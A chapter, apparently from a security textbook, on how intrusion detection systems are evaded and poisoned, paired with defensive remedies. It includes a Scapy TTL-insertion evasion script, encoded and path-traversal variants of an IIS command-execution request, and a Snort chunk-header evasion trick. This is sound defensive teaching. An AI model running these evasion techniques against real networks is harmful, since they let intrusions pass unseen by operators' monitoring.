A desynchronization attack [Hernacki et al. (2005)] aims to exploit differences between the overall view of the network traffic of the NIDS sensor and that of the monitored host(s). The NIDS is forced to be out of phase with respect to the monitored host(s) for an entire session. This attack can be realized using either insertion or exclusion actions, and can be based on the Time To Live (TTL) field of an IPv4 packet [IPv4]. Let us recall that the value of this field is decreased every time the packet passes through a router, in order to avoid possible traffic loops. Thus, if a router is placed between the NIDS (which monitors outbound and inbound traffic) and a monitored host, an attacker can set the TTL field of IPv4 packets to a value that is large enough for the packet to reach the sensor, but small enough to cause the packet to be dropped before reaching the destination [Ptacek and Newsham (1998)] (this is an insertion attack). Now, if the attacker sends an (apparent) packet duplicate (i.e., same sequence id) with a changed TTL field and content, such a packet is typically recognized by the NIDS as a duplicate and then discarded, while it will reach the destination. Such manipulations could be detected by the NIDS by storing and comparing the entire content of each packet, but unfortunately this approach can be very time- and memory-expensive in environments characterized by high bit rates. Even if the sensor is designed to analyze new packets regardless of duplication, it is possible to realize the same attack (through exclusion) by first sending the packet with malicious content to the destination, and then sending a duplicate packet with legitimate content crafted so that it reaches only the NIDS. As the NIDS takes into account the latest duplicate packet, the malicious content is not detected.

Let us make another example: following RFC 2616, the first line of an HTTP request (the request line) must specify the Method, Uniform Resource Identifier (URI) and HTTP version. From our experience, a modern web server like Apache also accepts a number of empty lines (Carriage Return (CR) and Line Feed (LF) characters) before the request line. A NIDS that does not consider this issue can discard such a request even if it has been processed successfully by the target. In this case, it loses the request URI and is probably forced to be out of phase (desynchronized) for the entire HTTP session, because many web attacks involve request URI manipulations (see Chapter 4).
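
As an illustration, the following minimal sketch shows how the TTL-based insertion described above could be crafted with the Scapy packet-manipulation library. The address, ports and payloads are hypothetical, and the TTL values assume that exactly one router separates the sensor from the target host; a real attacker would first probe the actual hop distance.

    # Sketch of a TTL-based insertion attack (hypothetical address/payloads).
    # Assumption: TTL=2 reaches the NIDS sensor but expires before the target.
    from scapy.all import IP, TCP, send

    target = "192.0.2.10"
    sport, dport, seq = 40000, 80, 1000

    # Seen by the NIDS only: the router drops it before it reaches the target.
    decoy = IP(dst=target, ttl=2) / TCP(sport=sport, dport=dport, seq=seq) / b"innocuous data"
    # Apparent duplicate (same sequence number) that does reach the target; a
    # sensor that discards "retransmissions" never inspects this content.
    real = IP(dst=target, ttl=64) / TCP(sport=sport, dport=dport, seq=seq) / b"malicious data"

    send(decoy)
    send(real)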
Encoding variations represent another evasion method. These are realized by encoding a traffic message so that its semantics on the NIDS differs from its semantics on the target [Hernacki et al. (2005)]. A typical example is the use of encoded characters in the request URI of an HTTP message. Each character in a request URI can be encoded using the % symbol followed by its position in the ASCII table. Request URIs like /MSADC/root.exe?/c+dir and %2fMS%41D%43%2f%72oot.%65x%65%3f%2f%61+di%72 are equivalent from the point of view of the target HTTP server (%2f is the encoding of /, %41 is the encoding of A, etc.), while a NIDS that does not apply the same character conversion will fail during the analysis phase. This issue may appear easy to solve, but in a heterogeneous environment, e.g., where different HTTP servers are employed, different encoding schemes must be taken into account. In this case, it is not only necessary to know every encoding scheme accepted by each server type, but also to apply the correct decoding process according to the destination host. For example, there are cases in which one character is equivalent to another: request URIs may be case insensitive (e.g., /InDeX.HtmL is equivalent to /index.html), and some Windows servers accept \ as equivalent to /. In addition, the traffic message semantics can remain the same from the point of view of the destination host under more skilled manipulations. For example, the request URI /MSADC/root.exe has the same meaning as /MSADC/../MSADC/../MSADC/root.exe, because /MSADC/../ identifies the root directory. Fig. 5.1 shows how an attacker may evade a NIDS that does not consider this equivalence. Since the NIDS does not apply the URI conversion (made by the victim), the string matching between the known attack /MSADC/root.exe?/c+dir and the current request URI fails. Thus, the attack is successful and no alerts are raised.

Figure 5.1: A skilled attacker evades NIDS detection by exploiting a flawed reconstruction of the traffic at the application level (i.e., through encoding variations). He modified his attack in order to both compromise the web server and evade detection.
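
To illustrate the defensive side, here is a minimal sketch (with a hypothetical signature string) of the normalization a NIDS should apply before string matching: percent-decoding, backslash conversion, path resolution and case folding. Without these steps, only the first of the three equivalent URIs below would match.

    import posixpath
    from urllib.parse import unquote

    SIGNATURE = "/msadc/root.exe"  # hypothetical known-attack substring

    def normalize(uri):
        decoded = unquote(uri)                # resolve %xx escapes (%2f -> /)
        decoded = decoded.replace("\\", "/")  # some Windows servers treat \ as /
        return posixpath.normpath(decoded).lower()  # collapse /MSADC/../, case-fold

    for uri in ("/MSADC/root.exe?/c+dir",
                "%2fMS%41D%43%2f%72oot.%65x%65%3f%2f%61+di%72",
                "/MSADC/../MSADC/../MSADC/root.exe?/c+dir"):
        print(uri, "->", SIGNATURE in normalize(uri))  # True for all three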

The segmentation and reordering technique subdivides the network traffic into multiple parts (possibly including duplicates) sent in an order such that the reconstruction made by the NIDS differs from that made by the destination hosts. This technique can be applied at multiple levels of the protocol stack (for example, IPv4, TCP and HTTP all allow for traffic segmentation). Such an attack is still very effective, even though it has been thoroughly analyzed in the past [Hernacki et al. (2005)].

Summing up, it is possible to realize complex and effective evading attacks against NIDS. The authors in [Gorton and Champion (2003)] showed that commonly a combination of factors is required to evade detection. They proposed a geometric approach to NIDS evasion: three different NIDS evasion techniques were combined into a three-dimensional testing space by manipulating the TCP/IP protocol, showing regions where the combined evasion techniques were not detected.

5.1.1.2 Adversarial environment against NIDS: Solutions

As previously discussed, a relevant problem of Network-based IDS is the effect of ambiguous traffic (e.g., packet duplicates). A solution proposed for preventing evasion attacks that exploit such a weakness is bifurcating analysis: the NIDS sensor deals with ambiguous traffic streams by instantiating separate analysis threads for each possible interpretation of the traffic [Paxson and Handley (1999)]. Obviously, in this case a trade-off is necessary between the maximum number of threads (spatial and computational resources) and the completeness of the method.
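
A minimal sketch of the idea, restricted to a single ambiguity type (overlapping TCP segments, where host stacks differ on whether the first or the last copy of a byte wins): the stream is reassembled under both policies and each candidate is scanned. The signature and segments below are illustrative only.

    # Bifurcating analysis sketch: scan every interpretation of an ambiguous
    # stream, here the two overlap-resolution policies of TCP reassembly.
    def reassemble(segments, prefer_new):
        buf = {}
        for offset, data in segments:
            for i, byte in enumerate(data):
                pos = offset + i
                if prefer_new or pos not in buf:
                    buf[pos] = byte
        return bytes(buf[i] for i in sorted(buf))

    def scan(segments, signature=b"attack"):
        # one analysis "thread" per interpretation of the traffic
        return any(signature in reassemble(segments, prefer_new=p)
                   for p in (False, True))

    # The second segment rewrites bytes 0-5 of the stream.
    segments = [(0, b"attXck-payload"), (0, b"attack")]
    print(scan(segments))  # True: the last-wins interpretation contains "attack"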

A device that has been proposed to increase the robustness against ambiguous traffic is the traffic normalizer. This is a network forwarding element that attempts to eliminate ambiguous network traffic, reducing the amount of connection state that the monitor must manage. Mandatory characteristics for such a device are to preserve end-to-end semantics and to guarantee high performance. A number of architectural considerations are associated with the design of a traffic normalizer [Paxson and Handley (1999), Handley et al. (2001)]. Of course, the communication mechanism between the normalizer and the monitor must be carefully designed. In addition, attacks against the normalizer itself must be taken into account. Provided that a traffic normalizer with a suitable design is available, it can prevent evasion attacks that leverage ambiguous TCP stream contents, the manipulation of TCP connection state, or the flooding of the monitor with bogus state [Paxson and Handley (1999), Handley et al. (2001)].

Some works have attempted to compare network-based solutions with host-based solutions from the point of view of attacks on the data acquisition module. The authors in [Basicevic et al. (2005)] showed that a distributed client-based NIDS may be more robust than HIPS (Host-based Intrusion Prevention Systems) against evasion techniques. That paper confirms that the use of client-based NIDS increases the overall robustness against evasion methods, even if no definitive conclusion can be drawn.

Furthermore, all network-based solutions must cope with performance issues, especially in high-speed networks. For example, in the recent paper [Antichi et al. (2009)], the authors propose an approach based on counting Bloom filters to perform pattern matching (i.e., for signature-based NIDS) in high-speed networks without reassembling packets. Their experimental results show that counting Bloom filters may spot fragmentation attacks without performing any packet reassembly, which may be expensive in high-speed networks. On the other hand, a number of false positive matches (i.e., false alarms) are possible with such a method. So, in general, countermeasures against network data acquisition attacks may be the result of a trade-off with some performance constraints.

Summing up, the effectiveness of a NIDS is strictly related to its capability of guaranteeing a traffic view and packet processing as similar as possible to those of the monitored host(s). This is accomplished by means of a careful design of the logical network architecture and the related placement of the NIDS. To this end, a client-based distributed NIDS approach, even if not always applicable, may represent a solution. This approach prefigures a NIDS sensor for each monitored host. In practice, it is sufficient to place a network sensor in each collision domain, i.e., a network segment where the host(s) share a physical link, so that the sensor can sniff the traffic related to every host in that segment. In this way, the traffic seen by the sensor is the same that reaches the monitored hosts. Even if this task often relies on human experience and common rules [Northcutt and Novak (2001)], a systematic approach has also been proposed [Rolando (2006)]. The shortcoming of that approach is that correct NIDS placement requires the knowledge of detailed attack definitions, which may not be available (and is certainly not available for new attacks). In addition, new protocols, technologies and applications, with their own specific security vulnerabilities, allow for new techniques that can affect network-based data acquisition.

Finally, it is worth noting that a large number of problems in network data acquisition can be dramatically reduced if the operating systems and applications running on the protected hosts are homogeneous and updated to the latest version. In this case, the NIDS can be tuned so that its traffic interpretation is very close to that of the operating systems/applications running at the host side. Also, to deal with these problems it is useful to correlate information from different sources, e.g., application and operating system logs from the networked host(s). However, this task is complicated by the adoption of virtual machines, since a single network interface might be shared by many virtual network interfaces on different virtual machines (e.g., with different OSes and running applications).

5.1.2 Host Data Acquisition


Motivation and purposes A Host-based IDS captures events related to a single host, using information from the operating system and/or from application logs. Therefore, HIDS are good at discerning attacks that are initiated by local users and that involve misuse of the capabilities of one host. HIDS are thus aimed at detecting attacks against critical information stored in a computer. It is easy to see that HIDS are not affected by the previously discussed issues related to the lack of knowledge of NIDS about the traffic processing performed by destination hosts.

5.1.3 Adversarial environment against HIDS: Problems


HIDS do not observe network events that occur at lower levels, because they only interpret high-level logging information. As an example, an attack exploiting vulnerabilities in the transition between different versions of IP (IPv4, IPv6) [Lancaster (2007)], which involves low-level (TCP/IP) manipulations, cannot be detected with a pure host-based solution.

A critical aspect of host data acquisition is the following. An attacker may exploit some internal bug of the monitored applications whose effects are not reported in the log files; such an attack is not observable by the HIDS, and detection is evaded. For example, a web server typically stores the fields of an HTTP request line in a log file after the request is processed. An application-specific HIDS can use this log file to detect evidence of web attacks. Nevertheless, this HIDS cannot work as expected if an attacker exploits a vulnerability in the interpretation phase of HTTP requests. In this case the data stored in the log file reflect a malicious interpretation of HTTP requests, and an adversary can exploit such a situation to evade the HIDS or to affect the integrity of the sensor's input data. Therefore, it is important to evaluate the reliability of the input data and take into account possible failures of the processing steps that produce those data. It is easy to see that such failures may negatively influence the expected analysis results during the training/operational phase of the IDS.

Another important issue of host data acquisition is related to the practical deployment of sensors. In some cases, host sensors may be difficult to deploy. For example, this is the case of a hotspot, which offers Internet access to any computer having the access credentials. The deployment of host sensors is also typically problematic in the case of palmtops or mobile devices.

Finally, an evident weakness of HIDS in the face of successful attacks is the fact that they are placed on the target machines. Thus, if an attacker exploits a vulnerability on that machine, he may disable or affect the HIDS sensor processing (see Fig. 5.2). Today, this is perhaps one of the main goals of a rootkit [Hoglund and Butler (2006)], i.e., malicious software which runs with high privileges on the target machine, without the need for a user's (e.g., administrator's) access credentials. One of the most popular rootkits is FU, which modifies data structures employed by the Windows XP kernel (Direct Kernel Object Manipulation) in order to hide the presence of files, processes, device drivers, etc. [Butler and Hoglund (2004)]. Such a technique prevents the operating system itself (by means of the system call functions) from retrieving information related to its state (e.g., running applications and loaded drivers).

5.1.4 Adversarial environment against HIDS: Solutions


Whereas in NIDS the input is well defined, as it is made up of TCP/IP network traffic, HIDS solutions are often specific to an application and/or an operating system, and their inputs may vary accordingly (i.e., web server logs, database logs, operating system calls, etc.). As a consequence, the effects of an adversary targeting the HIDS, and the related solutions, strictly depend on the asset protected by the HIDS. Let us make an example. If we have a computer dedicated to acting as a web server, administered by a trusted person, and configured with well-crafted internal access policies, we can reasonably assume that the probability of occurrence of insider intrusions is much lower than that of external intrusions. This computer will only have one open port (port 80), associated with the HTTP service, and it will not consider requests for other protocols or services.

Figure 5.2: After the web server is compromised, a skilled attacker evades HIDS detection by disabling or affecting the input of the host sensors. Typically this is one of the goals of a rootkit.

Thus, an external intruder may access this system through HTTP requests only. In this case, the security of the system can be entrusted to a HIDS sensor that monitors the HTTP server logs and, if a database is used, another HIDS sensor that monitors the database queries. Furthermore, an additional HIDS sensor that monitors open ports and running applications can be useful to detect suspicious host events (a minimal sketch of such a sensor is given below). For example, after a successful attack, new network services, such as an SSH server, may be activated in order to guarantee further access. Conversely, in this case the use of a HIDS that monitors only operating system calls and/or running applications is not sufficient, because the critical asset of this host is related to the HTTP service. This example points out the need for a careful choice of the input data sources to be analyzed by the HIDS, the choice depending on the services offered by the host and on the category of users accessing the system.
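
The following minimal sketch of such a sensor uses the third-party psutil library to compare the set of listening ports against a hypothetical policy for the dedicated web server described above, alerting on any deviation (e.g., a backdoor SSH server started after a compromise).

    # Minimal host sensor sketch: alert on unexpected listening ports.
    import time
    import psutil

    ALLOWED = {80}  # hypothetical policy: only the HTTP service should listen

    def listening_ports():
        return {c.laddr.port for c in psutil.net_connections(kind="inet")
                if c.status == psutil.CONN_LISTEN}

    while True:
        unexpected = listening_ports() - ALLOWED
        if unexpected:
            print("ALERT: unexpected listening ports:", sorted(unexpected))
        time.sleep(30)  # polling interval; a real sensor would log and correlate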

Typically, in order to detect attacks involving multiple hosts, a centralized monitoring console is used to apply common policies and correlate the alarms raised at individual hosts [IBM ISS IPS, Cisco IPS]. Intuitively, in such an architecture the centralized console represents a highly critical device, and thus it should be isolated from the monitored machines and from the external network.

Finally, the principal solution proposed so far to isolate HIDS sensors from the target machines is based on virtualization. The monitored machine runs in a virtual environment and, by means of a Virtual Machine Monitor (VMM), the IDS acquires data related to the state of the monitored machine. The VMM is able to retrieve low-level information regarding the monitored machine, e.g., the bytes it writes to physical memory or disk. The HIDS interacts with an Operating System (OS) library whose task is to translate the low-level information coming from the VMM into high-level (OS) information about the monitored machine (e.g., the list of running processes, or the contents of a file). Such an operation is also called Virtual Machine Introspection (VMI) [Garfinkel and Rosenblum (2003)]. It is easy to see that VMI requires a different OS library depending on the operating system of the monitored machine. Due to the flexibility of the virtualization approach, in recent years many works have applied it to solve different adversarial problems. For example, virtualization has been proposed for rootkit behavior profiling [Gadaleta et al. (2009)] and to defeat stack-based buffer overflow attacks [Riley et al. (2009)].

Virtualization is a very promising approach to strengthen HIDS solutions; nevertheless, some main issues still remain open:

• virtualization vulnerabilities: an attacker may exploit flaws in the design/implementation of the VMM in order to prevent the correct acquisition of data from the monitored machine;

• OS library vulnerabilities: since such a library relies on a priori knowledge of the data structures employed by the OS kernel, if the attacker is able to modify such data structures in the target machine (e.g., with Direct Kernel Object Manipulation techniques), the library may fail to correctly infer its state.

Thus, in practice, the relevance of these issues should always be weighed against the benefits of the virtualization approach for HIDS.

5.2 Data pre-processing


Motivation and purposes The data preprocessing step can be considered as the first phase in which data analysis is performed. This step is aimed at performing some kind of noise removal and data enhancement on the data extracted in the data acquisition step, so that the resulting data exhibit a higher signal-to-noise ratio. In this context, noise can be defined as information that is not useful, or even counterproductive, for distinguishing between attacks and legitimate activities. Enhancements, on the other hand, typically take into account a priori information regarding the domain of the intrusion detection problem. It is worth noting that in other application domains, such as image understanding, all the processing steps, from raw data to the final conceptual interpretation, have been deeply investigated over the years, and a large number of techniques are available. Thus, intrusion detection can rely on concepts developed in other well-established application domains to better design the different stages of information processing needed to detect intruders. As far as this stage is concerned, it is easy to see that critical information can be lost if we aim to remove all noisy patterns, or to enhance all relevant events, as typically only a coarse analysis of data can be performed at this stage. This fact can be explained by observing that in the early stages of data processing, low-level information is processed. As a consequence, only noise that can be clearly associated with the low-level data representation can be removed. Other kinds of noise can be detected only when data is analyzed and represented at a higher level (e.g., alarms), because higher-level concepts become available that allow removing noisy patterns, as well as enhancing relevant information. Thus, the goal of the data enhancement phase should not be to remove all noisy patterns, but only those patterns which can be considered as noise with high confidence. This aspect will be discussed in detail in the following Section.

5.2.1 Adversarial environment against data pre-processing: Problems
In the intrusion detection domain, we can define as noise all the information that at first seems representative of a class of activities, i.e., legitimate or attack activities, while it actually is not.

It is worth pointing out a concept that we will recall throughout this Chapter. Given a piece of information for which we can conclude that it is not related to legitimate activities, we cannot necessarily conclude that it is related to attacks against the monitored machines, and vice versa. That is, some information, i.e., noise, may describe neither legitimate activities nor attacks against the monitored machines. As this information is not representative of either of the two classes (legitimate traffic and attacks), it should be discarded, because its use in further steps can be counterproductive or, at least, not useful. Indeed, if this noisy information is used in further steps, it can cause an erroneous characterization of attacks and/or legitimate activities.

As data preprocessing involves data removal or data modification aimed at removing noise or enhancing some characteristics, it is easy to see that an adversary can leverage weaknesses of this task to deliberately inject malicious noise and affect the correct characterization of attacks and/or legitimate activities in further steps. Typically, attacks against the pre-processing stage are aimed either at erroneously inducing the classification of attack patterns as noise, or at forcing the inclusion of noisy patterns into the pool of legitimate traffic patterns.

5.2.2 Adversarial environment against data pre-processing: Solutions
In anomaly-based IDS, a model of legitimate activities must be designed. To this end, the data collected from a network node should be pre-processed in order to be as attack-free as possible. In this case, data preprocessing can be performed by using misuse-based IDS to detect known attack patterns in the network traffic; for example, Snort, the popular signature-based NIDS [Snort], can be used. The traffic associated to these attack patterns can be removed, while the remaining traffic can be considered as associated to legitimate activities.
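
A minimal sketch of this pre-filtering, with two hypothetical signatures standing in for a real rule set such as Snort's:

    # Drop training records that match known-attack signatures; keep the rest
    # as (presumably) legitimate traffic for training an anomaly detector.
    import re

    KNOWN_ATTACK_SIGNATURES = [re.compile(p) for p in
                               (r"/MSADC/root\.exe", r"(?i)union\s+select")]

    def is_known_attack(record):
        return any(sig.search(record) for sig in KNOWN_ATTACK_SIGNATURES)

    raw_traffic = ["GET /index.html HTTP/1.0",
                   "GET /MSADC/root.exe?/c+dir HTTP/1.0",
                   "GET /search?q=union select 1 HTTP/1.0"]
    training_set = [r for r in raw_traffic if not is_known_attack(r)]
    print(training_set)  # only the first request is kept for training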
However, traffic associated to new attacks, or other spurious traffic which is not representative of typical legitimate activity, might still be present. This kind of traffic is expected to account for a very small percentage of the pre-processed data. This is a reasonable assumption, because typically most of the users perform legitimate actions, that is, they use resources or services as expected. The latter assumption is the basis of outlier detection techniques [Tandon et al. (2004)]. Such techniques are aimed at evidencing patterns with different characteristics w.r.t. the majority of the patterns contained in a set. By means of outlier detection techniques it is possible to achieve a good classification accuracy for the information related to legitimate activity. For this reason, this technique is well suited to anomaly-based IDS.
Conceptually, outlier detection techniques may also be used to identify attack activities and the related traffic patterns. This result can be achieved by exploiting the data collected by so-called honeypots, i.e., computers or networks specifically designed to act as decoys for attackers [Kreibich and Crowcroft (2003)]. As these systems are not designed to offer network services, users performing legitimate operations should not access them. Thus, the activities performed on these systems can be classified as suspicious and probably related to attacks. That is, in principle, outlier detection techniques may help in better identifying information related to attacks, which can be further used to design misuse-based systems. However, it can easily be seen that if an adversary discovers which hosts are acting as honeypots, then the traffic collected by those hosts can be maliciously polluted, and we should be very careful in considering the majority of this information as related to attacks.
An example of a system that collects both legitimate activity and attack patterns is Polygraph, described in [Newsome et al. (2005)]. In that work, data preprocessing is performed by a network flow classifier. This system tags the traffic as legitimate or suspicious for the detection of worm activities, generating innocuous and suspicious flow pools, respectively. In particular, a misuse (signature) based detector is trained using traffic belonging to both classes. This system is vulnerable, as it does not take into account that even if suspicious traffic is not representative of the legitimate class, it is not necessarily representative of the attack class. This vulnerability has been shown in [Perdisci et al. (2006) (a), Newsome et al. (2006)], and it will be further discussed in Section 5.3.
An interesting question arises: could attacks against the learning phase of an IDS be defined as outliers, and thus removed from the training data? The answer is yes, at least for simple models. Let us consider an anomaly-based IDS that looks for buffer overflow attempts on protected hosts by analyzing the content of FTP commands. A (stack-based) buffer overflow attack exploits insufficient bounds checking on a buffer located on the stack to overflow the buffer and overwrite (hijack) the return address of the currently executing function, so that malicious code is executed [Aleph One]. This type of attack is clearly characterized by a command length larger than that of normal (legitimate) commands, because the input length must be larger than the buffer size. Thus, the training phase can be accomplished by modeling the length of normal FTP commands.

If an adversary were able to include in the training set FTP commands with arbitrarily large content length, he would probably affect the correct model inference. In this case, a subsequent buffer overflow attack would probably be classified as legitimate. It is not necessary that such commands reflect attacks against the monitored hosts: the malicious commands just have features (i.e., length) similar to those of attack commands. In this case, since the malicious commands are characterized by a higher length w.r.t. legitimate commands, they may be removed by means of outlier detection techniques.
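
The following sketch applies this idea with a simple robust statistic (median absolute deviation); the 3.5 threshold is a common heuristic, not a value prescribed here.

    # Remove training commands whose length is an outlier w.r.t. the majority.
    import statistics

    def remove_length_outliers(commands, threshold=3.5):
        lengths = [len(c) for c in commands]
        med = statistics.median(lengths)
        mad = statistics.median(abs(l - med) for l in lengths) or 1.0
        return [c for c, l in zip(commands, lengths)
                if abs(l - med) / mad <= threshold]

    commands = ["USER anonymous", "PASS guest", "RETR file.txt",
                "CWD /pub", "MKD " + "A" * 600]  # last one: injected noise
    print(remove_length_outliers(commands))  # the oversized command is dropped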

However, it should be recognized that while this example is very simple, in practice outlier detection is more difficult to apply, as it involves a trade-off between noise removal and information preservation. An additional difficulty in applying noise removal approaches arises when legitimate patterns are not the great majority of the training examples, because, for example, a small training set is considered and the attacker knows the time interval in which the training data are collected.

Data pre-processing also involves the enhancement phase, which is typically related to the removal of incomplete data (e.g., an incomplete HTTP session). As incomplete data may not allow extracting some relevant information on the traffic they are associated to (e.g., the end time of an HTTP session), they can be useless and thus should be discarded. Furthermore, data enhancement can also be performed as a set of data transformations aimed at better distinguishing attacks from legitimate activities. An example of this kind of pre-processing technique can be found in [Polychronakis et al. (2007)], where polymorphic shellcode attacks are detected. Typically these attacks are designed to exploit buffer overflow vulnerabilities to execute some useful CPU instructions on the target machine, and to escape detection by IDS using polymorphism, that is, different instances of the same attack are generated to evade signature-based IDS. To detect such attacks, the authors proposed a NIDS-embedded CPU emulator. First, a heuristic detection method scans the network traffic searching for suspicious instruction sequences, then the CPU emulator executes the suspicious sequences. The behavior of each suspicious sequence is then evaluated to detect shellcode execution. In this case, the CPU emulator is a way to perform data preprocessing and enhance the data, as the analysis is performed on the output of the CPU emulator rather than on the raw network traffic data.

It is worth noting that the data enhancement task can be useful to design an IDS that is robust with respect to an adversarial environment. In this case, it is more difficult for an adversary to inject noise, because spurious traffic instances (noise) that do not generate dangerous behavior on the target host (that is, traffic instances that do not represent attacks) can be discarded.

5.3 Feature selection


Motivation and purposes As previously discussed, data preprocessing is the first step in assessing the information related to the legitimate and/or the attack classes. The feature selection step aims at defining an optimal set of measures on the pre-processed data that allows attaining the best discrimination between attack and legitimate activity patterns. This set of features is defined and extracted using the prior knowledge available for each of the two classes.

5.3.1 Adversarial environment against Feature Selection: Problems
An adversary can affect both the feature definition and the feature extraction tasks. With reference to the feature definition task, an adversary can interfere with the process if this task has been designed to automatically define features from input data; this is the case when automatic adaptation mechanisms are used. With reference to the feature extraction task, the extraction of correct feature values depends on the tool used to process the collected data. This problem is similar to the desynchronization attacks against network data acquisition described in Section 5.1.1.1, where the attacker can exploit differences between feature extraction as it would be performed on the monitored system, and feature extraction as performed by the IDS.

Let us make an example related to an attack against the feature definition process. The worm signature generator Polygraph [Newsome et al. (2005)] is vulnerable to deliberate noise injection aimed at misleading the signature generator so that incorrect features are extracted [Perdisci et al. (2006) (a), Newsome et al. (2006)]. In particular, Polygraph pre-processes traffic data so that it is inserted into one of two pools: a legitimate pool and a suspicious pool. Then, common features of the suspicious pool are used to define the characteristics of attacks. An adversary can pollute the suspicious traffic flows to force Polygraph to generate signatures using wrong features. This is possible because, as evidenced in Section 5.2, an adversary can inject traffic that is identified as suspicious but does not reflect worm activities (that is, it does not represent attacks). This traffic affects the reliability of the IDS, because it is well crafted to induce the choice of a feature space which does not guarantee the expected discrimination capability between attacks and legitimate activity patterns. It is worth noting that in [Perdisci et al. (2006) (a)] only noise affecting the suspicious traffic pool is considered. However, following the general definition of noise proposed in Section 5.2, we can extend this reasoning to an adversary that injects patterns that are not representative of legitimate activity, but not necessarily related to attacks. These patterns can be included in the legitimate traffic pool that is used by Polygraph to verify the quality of the extracted features by minimizing the false alarm rate. Thus, if patterns similar to attack patterns are injected into the legitimate traffic pool, the system may be forced to choose low-quality features when minimizing the false alarm rate. This example is useful to point out that in every IDS both types of noise must be considered.


Now, let us make an example of an attack against the feature extraction process. In [Mutz et al. (2005)], the authors show an attack against the parser of the open-source IDS Snort that prevents the correct extraction of the chunk length value related to an HTTP message chunk. HTTP version 1.1 chunked encoding allows HTTP messages to be broken up into multiple parts called HTTP chunks. Following the relative RFC, every chunk must declare the byte length of its content in its first line. For example, if a chunk has 255 bytes, its first line will be ff\r\n (the hexadecimal value, followed by the Carriage Return and Line Feed characters). By adding a tab character, as in ff\t\r\n, Snort v. 2.1.1 fails to acquire the chunk length value (255 bytes). In such a case, Snort leaves the variable containing the chunk length at its initial value (zero), while the HTTP server Apache v. 2.0.1 still correctly acquires the ff value. Thus an attacker can not only design an evading attack, but can also influence the (acquired) value of a feature.
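
The divergence can be reproduced with two toy parsers: a naive one that fails on the embedded tab and falls back to the initial (zero) value, and a lenient one that, like the server, reads the leading hexadecimal digits and ignores the rest. Both are illustrative sketches, not the actual Snort or Apache code.

    def naive_chunk_size(line):
        try:
            return int(line.rstrip(b"\r\n"), 16)  # chokes on the embedded tab
        except ValueError:
            return 0  # the length variable keeps its initial value

    def lenient_chunk_size(line):
        i = 0
        while i < len(line) and chr(line[i]) in "0123456789abcdefABCDEF":
            i += 1
        return int(line[:i], 16) if i else 0  # reads "ff", ignores "\t\r\n"

    line = b"ff\t\r\n"
    print(naive_chunk_size(line), lenient_chunk_size(line))  # 0 255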

5.3.2 Adversarial environment against Feature Selection: Solutions
Even if many research works have been published on feature selection, to the best of our knowledge none of them has coped with an adversarial environment. As far as attacks against feature definition are concerned, in our opinion the effectiveness of the attack depends on the knowledge the attacker has of the algorithm used to define the optimal set of features: the better the knowledge, the more effective the attack. As security through obscurity is counterproductive, we propose as a possible solution the definition of a large number of redundant features. Then, random subsets of features could be used at different times, provided that a good discrimination between attacks and legitimate activities in the feature space is attained. This approach has been used in different fields, e.g., biometrics [Yong and Yangsheng (2006)], image retrieval [Tao et al. (2006)], and bio-molecular analysis [Bertoni et al. (2004)], typically to reduce the dimensionality of feature subspaces and thus the well-known curse of dimensionality problem [Duda et al. (2000)] (we will further discuss this problem in Section 5.5.5). In this way, an adversary is uncertain about the subset of features that is used in a certain time interval, and thus it can be more difficult to conceive effective malicious noise. However, it should be recognized that the use of random subsets of features must be carefully designed to guarantee a high discrimination capability between attacks and legitimate activities.
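
A minimal sketch of this randomization, with illustrative feature names: at each retraining interval a random subset of the redundant feature set is drawn, so the active features vary over time.

    # Draw a random subset of a large redundant feature set.
    import random

    ALL_FEATURES = ["uri_length", "num_params", "pct_encoded_chars",
                    "digit_ratio", "header_count", "payload_entropy",
                    "path_depth", "query_length"]

    def draw_feature_subset(k=4, seed=None):
        # in practice the seed would be secret and changed at each interval
        return random.Random(seed).sample(ALL_FEATURES, k)

    print(draw_feature_subset())  # e.g. ['path_depth', 'uri_length', ...]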
As far as attacks against the feature extraction process are concerned, the key point is that this task must be strictly related to the data processing performed by the monitored systems. It should be clear from Section 5.1.1.1 that the feature extraction process on the IDS may differ from that of the monitored systems, because different implementations of the standards on which the IDS and the hosts rely may yield different feature values. It should be recognized that, in practice, it is definitely a hard task to guarantee this synchronization between the IDS and the monitored systems. In our opinion, a way to address this problem at its root can be the use of host-based data acquisition. In particular, the monitored system itself could send the features extracted from the input data to the IDS: in this way the problem can be addressed. Evidently, in such a solution the monitored system and the IDS are strictly coupled, which implies, at least, a lower flexibility in the choice of the IDS input source. However, it must be recognized that a solution can be based on virtual machines, to guarantee both synchronization between the IDS and the monitored system, and more flexibility [Garfinkel and Rosenblum (2003)].

5.4 Model Selection


In this Section we discuss the problems and solutions of model selection in the adversarial environment context. This aspect is particularly interesting for future IDS solutions, which, due to the increasing number and complexity of threats, are expected to increasingly adopt (automated) model selection techniques.

Motivation and purposes The model selection phase aims at describing (modeling) the patterns associated to attacks and/or legitimate activities, using a set of training patterns. It should be clear from the previous sections that labeling data for the creation of the training set is not an easy task, and that this activity is vulnerable to adversaries who try to pollute the data. The training patterns are described using the features defined and extracted in the feature selection phase. A model for attack and/or legitimate activity patterns is then selected so that the best discrimination between these two classes on the training set, or on a validation set, is attained. The selected model is then used to assign the data processed by the IDS to one of the two classes during the classification phase.

5.4.1 Adversarial environment against Model Selection: Problems


We have already discussed adversaries that exploit vulnerabilities of the IDS in data acquisition, data pre-processing and feature selection in order to inject noise into the training set used to perform the model selection. This noise is aimed at affecting model selection so that the resulting discrimination capability between attacks and legitimate activity patterns is reduced w.r.t. a model selected using a noise-free training set. In this way, due to a non-optimal or erroneous model, some patterns related to attacks could be classified as legitimate (that is, the IDS can be evaded), or some patterns related to legitimate activities could be classified as attacks (that is, the IDS generates false alarms).

In order to automatically perform the model selection, machine learning algorithms have been extensively applied, especially in recent years. The effectiveness of machine learning techniques is strictly related to the representativeness of the training set w.r.t. the patterns that will be analyzed during the detection phase. However, no matter how carefully the training data has been collected so that it is representative of typical working conditions, training data cannot be considered noiseless, as stated in Sections 5.1, 5.2 and 5.3. Here we identify two principal noise components that should be taken into account when designing machine learning algorithms:

• independent noise: noisy patterns that appear in the training set regardless of whether a machine learning algorithm is used. That is, there is no correlation between the observation of such patterns and the use of a machine learning algorithm;

• malicious noise: noisy patterns that appear in the training set precisely because a machine learning algorithm is used. These patterns are intentionally inserted by an adversary so that the machine learning algorithm is misled into using them to model a class they do not belong to; they thus give the adversary some control over the model selection phase. In the literature, this operation is often referred to as mis-training.

